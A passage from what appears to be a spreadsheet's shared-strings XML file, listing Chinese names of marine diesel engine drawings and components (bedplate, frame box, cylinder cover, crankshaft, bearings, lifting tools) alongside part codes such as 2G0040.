    <t xml:space="preserve">管子通用焊接符号                                          </t>
  </si>
  <si>
    <t xml:space="preserve">包装清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">直堵考克                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机舱外部管子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">海面状橡胶                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷射辅助管支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄漏报警                                              </t>
  </si>
  <si>
    <t>2G0040</t>
  </si>
  <si>
    <t>2G0041</t>
  </si>
  <si>
    <t xml:space="preserve">PTO前端尺寸图                                          </t>
  </si>
  <si>
    <t>2G0042</t>
  </si>
  <si>
    <t xml:space="preserve">PTO后端尺寸图                                          </t>
  </si>
  <si>
    <t>2G0043</t>
  </si>
  <si>
    <t>2G0049</t>
  </si>
  <si>
    <t xml:space="preserve">环氧树脂垫块图                                           </t>
  </si>
  <si>
    <t>2G0060</t>
  </si>
  <si>
    <t xml:space="preserve">钢垫块图                                              </t>
  </si>
  <si>
    <t>2G0062</t>
  </si>
  <si>
    <t xml:space="preserve">底脚螺栓                                              </t>
  </si>
  <si>
    <t>2G0066</t>
  </si>
  <si>
    <t>2G0067</t>
  </si>
  <si>
    <t xml:space="preserve">测试台                                               </t>
  </si>
  <si>
    <t>2G0069</t>
  </si>
  <si>
    <t xml:space="preserve">端挡板                                               </t>
  </si>
  <si>
    <t>2G0070</t>
  </si>
  <si>
    <t>2G0102</t>
  </si>
  <si>
    <t>2G0112</t>
  </si>
  <si>
    <t>2G0134</t>
  </si>
  <si>
    <t>2G0206</t>
  </si>
  <si>
    <t>2G0930</t>
  </si>
  <si>
    <t>2G1000</t>
  </si>
  <si>
    <t>2G1002</t>
  </si>
  <si>
    <t>2G1020</t>
  </si>
  <si>
    <t>2G1021</t>
  </si>
  <si>
    <t>2G1023</t>
  </si>
  <si>
    <t>2G1024</t>
  </si>
  <si>
    <t>2G1026</t>
  </si>
  <si>
    <t>2G1027</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱顶部                                             </t>
  </si>
  <si>
    <t>2G1030</t>
  </si>
  <si>
    <t>2G1031</t>
  </si>
  <si>
    <t>2G1033</t>
  </si>
  <si>
    <t>2G1034</t>
  </si>
  <si>
    <t>2G1080</t>
  </si>
  <si>
    <t>2G1081</t>
  </si>
  <si>
    <t>2G1082</t>
  </si>
  <si>
    <t xml:space="preserve">铸造轴承座                                             </t>
  </si>
  <si>
    <t>2G1083</t>
  </si>
  <si>
    <t xml:space="preserve">前端轴承盖                                             </t>
  </si>
  <si>
    <t>2G1084</t>
  </si>
  <si>
    <t xml:space="preserve">后端轴承盖                                             </t>
  </si>
  <si>
    <t>2G1085</t>
  </si>
  <si>
    <t xml:space="preserve">铸造轴承盖                                             </t>
  </si>
  <si>
    <t>2G1086</t>
  </si>
  <si>
    <t>2G1100</t>
  </si>
  <si>
    <t>2G1102</t>
  </si>
  <si>
    <t>2G1200</t>
  </si>
  <si>
    <t>2G1210</t>
  </si>
  <si>
    <t>2G1212</t>
  </si>
  <si>
    <t>2G1216</t>
  </si>
  <si>
    <t>2G1218</t>
  </si>
  <si>
    <t>2G1220</t>
  </si>
  <si>
    <t>2G1222</t>
  </si>
  <si>
    <t>2G1224</t>
  </si>
  <si>
    <t>2G1228</t>
  </si>
  <si>
    <t>2G1248</t>
  </si>
  <si>
    <t>2G1260</t>
  </si>
  <si>
    <t>2G1262</t>
  </si>
  <si>
    <t>2G1280</t>
  </si>
  <si>
    <t>2G1282</t>
  </si>
  <si>
    <t>2G1290</t>
  </si>
  <si>
    <t>2G2105</t>
  </si>
  <si>
    <t>2G2125</t>
  </si>
  <si>
    <t>2G2126</t>
  </si>
  <si>
    <t>2G2127</t>
  </si>
  <si>
    <t xml:space="preserve">驱动泵齿轮                                             </t>
  </si>
  <si>
    <t>2G2145</t>
  </si>
  <si>
    <t>2G2200</t>
  </si>
  <si>
    <t>2G2203</t>
  </si>
  <si>
    <t>2G2213</t>
  </si>
  <si>
    <t>2G2214</t>
  </si>
  <si>
    <t>2G2217</t>
  </si>
  <si>
    <t xml:space="preserve">分离环粗加工                                            </t>
  </si>
  <si>
    <t>2G2218</t>
  </si>
  <si>
    <t>2G2220</t>
  </si>
  <si>
    <t>2G2221</t>
  </si>
  <si>
    <t>2G2320</t>
  </si>
  <si>
    <t xml:space="preserve">活塞粗加工法兰                                           </t>
  </si>
  <si>
    <t>2G2321</t>
  </si>
  <si>
    <t>2G2345</t>
  </si>
  <si>
    <t>2G2349</t>
  </si>
  <si>
    <t>2G2400</t>
  </si>
  <si>
    <t>2G2402</t>
  </si>
  <si>
    <t>2G2403</t>
  </si>
  <si>
    <t>2G2436</t>
  </si>
  <si>
    <t>2G2440</t>
  </si>
  <si>
    <t>2G2515</t>
  </si>
  <si>
    <t>2G2520</t>
  </si>
  <si>
    <t>2G2530</t>
  </si>
  <si>
    <t>2G2535</t>
  </si>
  <si>
    <t>2G3021</t>
  </si>
  <si>
    <t>2G3028</t>
  </si>
  <si>
    <t xml:space="preserve">控制阀接头                                             </t>
  </si>
  <si>
    <t>2G3067</t>
  </si>
  <si>
    <t xml:space="preserve">控制阀滤器                                             </t>
  </si>
  <si>
    <t>2G3069</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀接头                                             </t>
  </si>
  <si>
    <t>2G3087</t>
  </si>
  <si>
    <t>2G3088</t>
  </si>
  <si>
    <t>2G3120</t>
  </si>
  <si>
    <t>2G3121</t>
  </si>
  <si>
    <t>2G3125</t>
  </si>
  <si>
    <t>2G3140</t>
  </si>
  <si>
    <t>2G3141</t>
  </si>
  <si>
    <t xml:space="preserve">放气预滤器                                             </t>
  </si>
  <si>
    <t>2G3206</t>
  </si>
  <si>
    <t>2G3218</t>
  </si>
  <si>
    <t>2G3219</t>
  </si>
  <si>
    <t xml:space="preserve">滤器放泄螺栓                                            </t>
  </si>
  <si>
    <t>2G3244</t>
  </si>
  <si>
    <t>2G3245</t>
  </si>
  <si>
    <t>2G3249</t>
  </si>
  <si>
    <t>2G3254</t>
  </si>
  <si>
    <t>2G3312</t>
  </si>
  <si>
    <t>2G3314</t>
  </si>
  <si>
    <t>2G3334</t>
  </si>
  <si>
    <t>2G3335</t>
  </si>
  <si>
    <t>2G3338</t>
  </si>
  <si>
    <t xml:space="preserve">铸造油冷却器端盖                                          </t>
  </si>
  <si>
    <t>2G3339</t>
  </si>
  <si>
    <t>2G3343</t>
  </si>
  <si>
    <t>2G3344</t>
  </si>
  <si>
    <t>2G3345</t>
  </si>
  <si>
    <t>2G3346</t>
  </si>
  <si>
    <t xml:space="preserve">油蓄压器                                              </t>
  </si>
  <si>
    <t>2G3364</t>
  </si>
  <si>
    <t>2G3365</t>
  </si>
  <si>
    <t>2G3409</t>
  </si>
  <si>
    <t xml:space="preserve">节距控制单元门盖                                          </t>
  </si>
  <si>
    <t>2G3410</t>
  </si>
  <si>
    <t>2G3412</t>
  </si>
  <si>
    <t>2G3413</t>
  </si>
  <si>
    <t>2G3417</t>
  </si>
  <si>
    <t>2G3431</t>
  </si>
  <si>
    <t>2G3433</t>
  </si>
  <si>
    <t xml:space="preserve">叉形十字头                                             </t>
  </si>
  <si>
    <t>2G3436</t>
  </si>
  <si>
    <t xml:space="preserve">执行机构连接环                                           </t>
  </si>
  <si>
    <t>2G3438</t>
  </si>
  <si>
    <t xml:space="preserve">链环衬套                                              </t>
  </si>
  <si>
    <t>2G3440</t>
  </si>
  <si>
    <t xml:space="preserve">十字头定位                                             </t>
  </si>
  <si>
    <t>2G3441</t>
  </si>
  <si>
    <t xml:space="preserve">桨距控制叉形臂                                           </t>
  </si>
  <si>
    <t>2G3450</t>
  </si>
  <si>
    <t>2G3478</t>
  </si>
  <si>
    <t>2G3504</t>
  </si>
  <si>
    <t>2G3509</t>
  </si>
  <si>
    <t>2G3510</t>
  </si>
  <si>
    <t>2G3511</t>
  </si>
  <si>
    <t xml:space="preserve">油套管端盖-坯                                           </t>
  </si>
  <si>
    <t>2G3512</t>
  </si>
  <si>
    <t>2G3540</t>
  </si>
  <si>
    <t>2G3542</t>
  </si>
  <si>
    <t>2G3600</t>
  </si>
  <si>
    <t>2G3601</t>
  </si>
  <si>
    <t>2G3605</t>
  </si>
  <si>
    <t>2G3654</t>
  </si>
  <si>
    <t>2G3655</t>
  </si>
  <si>
    <t>2G3702</t>
  </si>
  <si>
    <t>2G3804</t>
  </si>
  <si>
    <t>2G3808</t>
  </si>
  <si>
    <t>2G3824</t>
  </si>
  <si>
    <t>2G3828</t>
  </si>
  <si>
    <t>2G3844</t>
  </si>
  <si>
    <t>2G3848</t>
  </si>
  <si>
    <t>2G3864</t>
  </si>
  <si>
    <t>2G3868</t>
  </si>
  <si>
    <t>2G5048</t>
  </si>
  <si>
    <t>2G5049</t>
  </si>
  <si>
    <t>2G5083</t>
  </si>
  <si>
    <t xml:space="preserve">定距环-紧急控                                           </t>
  </si>
  <si>
    <t>2G5085</t>
  </si>
  <si>
    <t>2G5088</t>
  </si>
  <si>
    <t>2G5089</t>
  </si>
  <si>
    <t>2G5114</t>
  </si>
  <si>
    <t xml:space="preserve">标准外备件提供                                           </t>
  </si>
  <si>
    <t>2G5202</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮投油                                              </t>
  </si>
  <si>
    <t>2G5250</t>
  </si>
  <si>
    <t>2G5252</t>
  </si>
  <si>
    <t>2G5254</t>
  </si>
  <si>
    <t>2G5262</t>
  </si>
  <si>
    <t>2G5264</t>
  </si>
  <si>
    <t>2G9000</t>
  </si>
  <si>
    <t>2G9003</t>
  </si>
  <si>
    <t>2G9007</t>
  </si>
  <si>
    <t>2G9010</t>
  </si>
  <si>
    <t>2G9011</t>
  </si>
  <si>
    <t>2G9200</t>
  </si>
  <si>
    <t>2G9220</t>
  </si>
  <si>
    <t>2G9280</t>
  </si>
  <si>
    <t xml:space="preserve">带螺母的角度球形接头                                        </t>
  </si>
  <si>
    <t>2G9281</t>
  </si>
  <si>
    <t xml:space="preserve">Y56F截面图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">K67GF截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L90GF截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L80GF截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">K98FF截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">K62+62VT2截面图                                      </t>
  </si>
  <si>
    <t xml:space="preserve">K42+42VT2截面图                                      </t>
  </si>
  <si>
    <t xml:space="preserve">L45GF截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L90MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L80MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L70MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L60MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">L50MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">S60MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">K80MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">K90MC-2截面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">K80MC-C截面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">S50MC截面图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">S90MC-T截面图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">间隙                                                </t>
  </si>
  <si>
    <t xml:space="preserve">IMO技术文件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">附件A：IMO技术文件                                       </t>
  </si>
  <si>
    <t xml:space="preserve">附件B：IMO技术文件                                       </t>
  </si>
  <si>
    <t xml:space="preserve">国际船级社协会UR-M44文档                                   </t>
  </si>
  <si>
    <t xml:space="preserve">IMO支持文档                                           </t>
  </si>
  <si>
    <t xml:space="preserve">IMO用户技术文件手册                                       </t>
  </si>
  <si>
    <t xml:space="preserve">应变测试点                                             </t>
  </si>
  <si>
    <t xml:space="preserve">变频器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">装置规格备注                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接地装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">材料表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">容量表                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气温度和排气总量                                         </t>
  </si>
  <si>
    <t xml:space="preserve">主、辅机容量                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器转子备件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">盘车齿轮控制系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">热平衡                                               </t>
  </si>
  <si>
    <t xml:space="preserve">平台试车，磨合                                           </t>
  </si>
  <si>
    <t xml:space="preserve">平台提交试车                                            </t>
  </si>
  <si>
    <t xml:space="preserve">码头试车&amp;试航                                           </t>
  </si>
  <si>
    <t xml:space="preserve">码头试车&amp;试航确认                                         </t>
  </si>
  <si>
    <t xml:space="preserve">码头动车（不带螺旋浆）                                       </t>
  </si>
  <si>
    <t xml:space="preserve">声音测量曲线                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机中的水和油                                          </t>
  </si>
  <si>
    <t xml:space="preserve">侧推力力距                                             </t>
  </si>
  <si>
    <t xml:space="preserve">外部力和力距描述                                          </t>
  </si>
  <si>
    <t xml:space="preserve">S50L截面图                                           </t>
  </si>
  <si>
    <t xml:space="preserve"> 气缸截面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高压喷射设备                                            </t>
  </si>
  <si>
    <t xml:space="preserve">功率降低曲线                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">S35P重心                                            </t>
  </si>
  <si>
    <t xml:space="preserve">U35P重心                                            </t>
  </si>
  <si>
    <t xml:space="preserve">测量点                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油消耗率曲线                                           </t>
  </si>
  <si>
    <t xml:space="preserve">氮化工艺                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃气系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却/加热系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷射体备件清单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">外连接列表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管系安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">淡水泵技术数据                                           </t>
  </si>
  <si>
    <t xml:space="preserve">运算说明书、                                            </t>
  </si>
  <si>
    <t xml:space="preserve">平面图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">截留装备                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座形位工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发电机剖面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座后端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座剖面图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">径向轴承座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">径梁前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">径梁后端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座加工图-中间                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机座焊接图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座加工图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座中、前部焊接                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机座前、中部加工图                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机座中、后部加工图                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机座钢板切割                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座加工顶视图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座底视图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座后侧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座特殊镗孔                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴向振动监测器安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">前端面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">LB/DLH涂层工艺                                        </t>
  </si>
  <si>
    <t xml:space="preserve">轴承制造商                                             </t>
  </si>
  <si>
    <t xml:space="preserve">径向轴承滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油盘提升附件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">挡栅                                                </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承螺杆                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座正视图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">球扁钢                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机座铸铁楔块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">焊接程序规格概要                                          </t>
  </si>
  <si>
    <t xml:space="preserve">焊接程序规格                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座机架热处理                                           </t>
  </si>
  <si>
    <t xml:space="preserve">径向轴承定位钢丝                                          </t>
  </si>
  <si>
    <t xml:space="preserve">轴承盖提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拆卸主轴瓦手柄                                           </t>
  </si>
  <si>
    <t xml:space="preserve">径向轴承盖提升工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">回油盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承白合金                                            </t>
  </si>
  <si>
    <t xml:space="preserve">径向轴承白合金                                           </t>
  </si>
  <si>
    <t xml:space="preserve">焊接基础剖面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机加工基础剖面                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座上的调节螺钉                                          </t>
  </si>
  <si>
    <t xml:space="preserve">焊接机座架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机加工基架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">框架的主要尺寸                                           </t>
  </si>
  <si>
    <t xml:space="preserve">量油计支座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机底端板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">前视图底座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接质量规范                                            </t>
  </si>
  <si>
    <t xml:space="preserve">格栅框架形位工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">弯板技术要求                                            </t>
  </si>
  <si>
    <t xml:space="preserve">后框架剖视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">拉撑板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机架下料清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架截面图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧后端横粱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧前端横粱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">后端横粱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">前端机架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">后端机架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧后端横粱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架(前端视图)                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架(后端视图)                                          </t>
  </si>
  <si>
    <t xml:space="preserve">格栅截面图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">底层机架截面图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架和链条焊接                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架加工图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架中间焊接                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架中间加工                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架中前端加工                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架中后端加工                                           </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺钉总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺钉装配图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺钉套环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">拉撑螺柱安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油漏斗                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱表面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架底部法兰                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锡铝推力垫片                                            </t>
  </si>
  <si>
    <t xml:space="preserve">铅铜推力垫片                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架(中部视图)                                          </t>
  </si>
  <si>
    <t xml:space="preserve">坐标尺寸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架(俯视图)                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机架底视图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架凸轮侧                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架中间段                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机架后段                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架形位公差                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱后上盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接线箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">温度传感器图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锡铝轴承制造商                                           </t>
  </si>
  <si>
    <t xml:space="preserve">铅铜轴承制造商                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导向轴承轴瓦清单                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架顶部和凸轮轴侧                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机架前侧和后侧                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度传感器制造商                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架顶视图、侧视图                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机架顶部和侧部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滑块/主轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">文字表格                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔面温度传感器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架连接轴侧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机架供应图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱与盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发动机出口回油箱进口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">油密封盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">自由端门盖上部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">自由端门盖下部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上护套焊接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">下护套焊接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">护板焊接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄箱门盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带安全阀的盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">圆门盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">防护                                                </t>
  </si>
  <si>
    <t xml:space="preserve">上部防护                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶部单元板清单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体总图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体螺柱布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水连接安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴座内支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体中剖面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体前端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体后端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体顶视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体底视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体凸轮侧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体排气侧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸套管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体形状位置工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套质量指导                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸套横梁                                             </t>
  </si>
  <si>
    <r>
      <t>气缸套磨损测量点</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                          </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">倾斜提升螺丝                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖质量指导                                            </t>
  </si>
  <si>
    <t xml:space="preserve">焊接说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀布置                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃烧室                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃汽油阀螺栓                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀法兰.                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀衬套组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀螺柱安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖上部前视图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖上部侧视图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖上部下视图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气管横截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖上平面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖上部横截面                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖侧视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖下视图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖截面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖横截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖冷却孔                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖前部，底部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖燃油阀截面                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖下部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖截面详细资料                                          </t>
  </si>
  <si>
    <t xml:space="preserve">进口通道截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气通道截面                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖起吊工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖支撑走台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器座研磨器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀座研磨器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压上紧环组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖螺栓上紧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖变更                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴前视图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴后视图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴形状位置工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">平衡数据                                              </t>
  </si>
  <si>
    <t xml:space="preserve">认可证书                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴端部间隙                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴公差值                                             </t>
  </si>
  <si>
    <t xml:space="preserve">形位公差                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴材料清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锻造曲轴质量规范                                          </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴量规                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减震器测量说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">白合金轴承质量说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承座                                            </t>
  </si>
  <si>
    <t xml:space="preserve">止推环垫圈.白合金                                         </t>
  </si>
  <si>
    <t xml:space="preserve">直径间隙                                              </t>
  </si>
  <si>
    <t xml:space="preserve">铅铜连杆轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锡铝连杆轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">十字头油挡块工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">填料函弹簧安装工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">绳索导向座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄销轴承支撑工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">大端轴承起吊工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">伸缩管支撑工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">十字头轴承合金                                           </t>
  </si>
  <si>
